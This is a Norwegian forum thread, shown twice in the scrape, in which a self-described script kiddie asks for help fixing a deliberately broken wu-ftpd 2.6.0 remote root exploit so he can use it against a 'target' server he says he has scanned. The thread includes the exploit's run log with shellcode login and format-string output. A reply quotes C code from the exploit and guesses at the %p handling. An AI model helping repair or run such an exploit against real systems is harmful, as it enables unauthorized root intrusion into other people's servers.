Wu-ftpd 2.6.0 remote exploit

Prazor · 25. desember 2001, 02:31

Ok. Nå har det seg slik, at jeg har en "target" som er så dum som har wu-ftpd 2.6.0 inne ;P *lol* sier jeg

Også har jeg funnet en flott remote exploit til den. Har også scannet den for om den er exploitable (Ja det er den).

Exploiten:
3:wuftpd2600.c
Wu-Ftpd 2.6.0 remote root exploit. Account is not required, anonymous access is enough. Tested against Redhat 6.2, Suse 6.3 and 6.4, FreeBSD 3.4-STABLE, FreeBSD 3.4-RELEASE, and FreeBSD 4.0-RELEASE. Slightly broken to prevent kids usage. By tf8

Og da har jeg et problem. Jeg er en kidd0e

og kan ikke helt C. Noen som hadde giddet å sett på scriptet og sett om de kunne funnet ut hva som må til for å få det til å funke skikkelig?
scriptet: http://packetstormsecurity.org/0006-...s/wuftpd2600.c

Det som skjer:
root@Warrior:~/1337/wuftpd# ./wuftpd2600 -t XXX.XXX.XXX.XXX
Target: XXX.XXX.XXX.XXX (ftp/<shellcode>): RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb038, Shellcode: 152

loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS <shellcode>
230-Next time please use your e-mail address as your password
230- for example: joe@89.ppp1-1.br.tiscali.no
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@XXX.XXX.XXX.XXX
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
Fix me, incorrect response from '%p':200-xx8°ÿ¿?????????????????????????????????????????????????????? ????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????
???????????????????????????????????????????????÷8î???????
|???????

TipeX · 25. desember 2001, 16:49

Sitat:

(void)bzero(buff_p,4096);
ftp_siteexec(sock,buff,strlen(buff),1,buff_p,4095);
if((buff_p2=strchr(buff_p,'\r'))!=NULL)
*buff_p2=(char)0;
if((buff_p2=strchr(buff_p,'\n'))!=NULL)
*buff_p2=(char)0;
buff_p2=strstr(buff_p,"|0x");
if(buff_p2==NULL){
fprintf(stderr,"Fix me, incorrect response from '%%p':%s\n",buff_p);
exit(1);
}

Er der feilen blir printa ut iallefall. Så litt på diverse variabler og la merke til at noen plasser er det %p%p og andre bare %p. Om det har noe og si vet jeg ikke

25. desember 2001, 02:31	#1
Prazor Registreringsdato: jul 2001 Innlegg: 522	Wu-ftpd 2.6.0 remote exploit Ok. Nå har det seg slik, at jeg har en "target" som er så dum som har wu-ftpd 2.6.0 inne ;P lol sier jeg Også har jeg funnet en flott remote exploit til den. Har også scannet den for om den er exploitable (Ja det er den). Exploiten: 3:wuftpd2600.c Wu-Ftpd 2.6.0 remote root exploit. Account is not required, anonymous access is enough. Tested against Redhat 6.2, Suse 6.3 and 6.4, FreeBSD 3.4-STABLE, FreeBSD 3.4-RELEASE, and FreeBSD 4.0-RELEASE. Slightly broken to prevent kids usage. By tf8 Og da har jeg et problem. Jeg er en kidd0e og kan ikke helt C. Noen som hadde giddet å sett på scriptet og sett om de kunne funnet ut hva som må til for å få det til å funke skikkelig? scriptet: http://packetstormsecurity.org/0006-...s/wuftpd2600.c Det som skjer: root@Warrior:~/1337/wuftpd# ./wuftpd2600 -t XXX.XXX.XXX.XXX Target: XXX.XXX.XXX.XXX (ftp/<shellcode>): RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm Return Address: 0x08075844, AddrRetAddr: 0xbfffb038, Shellcode: 152 loggin into system.. USER ftp 331 Guest login ok, send your complete e-mail address as password. PASS <shellcode> 230-Next time please use your e-mail address as your password 230- for example: joe@89.ppp1-1.br.tiscali.no 230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@XXX.XXX.XXX.XXX 230-If you do have problems, please try using a dash (-) as the first character 230-of your password -- this will turn off the continuation messages that may 230-be confusing your ftp client. 230- 230 Guest login ok, access restrictions apply. STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04] STEP 3 : Checking if we can reach our return address by format string Fix me, incorrect response from '%p':200-xx8°ÿ¿?????????????????????????????????????????????????????? ???? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????? ???????????????????????????????????????????????÷8î??????? \|???????
Prazor Registreringsdato: jul 2001 Innlegg: 522
	Sist endret av Prazor; 25. desember 2001 kl. 02:34.

25. desember 2001, 16:49	#2
TipeX Nub! nFF Crew Registreringsdato: mar 2001 Sted: Rikers Island Innlegg: 2.615 Subkulturell kapital: 126	Sitat: (void)bzero(buff_p,4096); ftp_siteexec(sock,buff,strlen(buff),1,buff_p,4095); if((buff_p2=strchr(buff_p,'\r'))!=NULL) buff_p2=(char)0; if((buff_p2=strchr(buff_p,'\n'))!=NULL) buff_p2=(char)0; buff_p2=strstr(buff_p,"\|0x"); if(buff_p2==NULL){ fprintf(stderr,"Fix me, incorrect response from '%%p':%s\n",buff_p); exit(1); } Er der feilen blir printa ut iallefall. Så litt på diverse variabler og la merke til at noen plasser er det %p%p og andre bare %p. Om det har noe og si vet jeg ikke
	19:21:44 <Deezire> Personlig så liker jeg deg veldig godt

Trådverktøy
Vis utskriftsvennlig versjon Send siden som e-post